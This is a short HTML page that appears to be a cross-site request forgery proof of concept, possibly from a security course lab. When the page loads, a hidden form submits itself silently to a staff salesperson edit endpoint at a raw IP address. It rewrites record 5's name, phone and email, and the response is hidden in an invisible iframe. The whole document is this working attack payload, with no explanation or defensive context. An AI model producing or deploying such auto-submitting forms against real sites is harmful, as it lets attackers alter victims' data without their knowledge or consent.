
<!DOCTYPE html>

<html>
    <body><!--- onload="document.myForm.submit()"> --->
        <form name="myForm" method="POST" action="https://104.198.208.81/red/public/staff/salespeople/edit.php?id=5" style="display: none;" target="r"> 
            <input type="text" name="first_name" value="Ronald">
            <input type="text" name="last_name" value="McDonald">
            <input type="text" name="phone" value="123-456-7890">
            <input type="text" name="email" value="ron@mcdonald.com">
            <input type="submit" value="Submit" hidden="">
        </form>
        <script>document.myForm.submit();</script>
        <iframe name="r" style="display: none;">
        </iframe>
    </body>
</html>
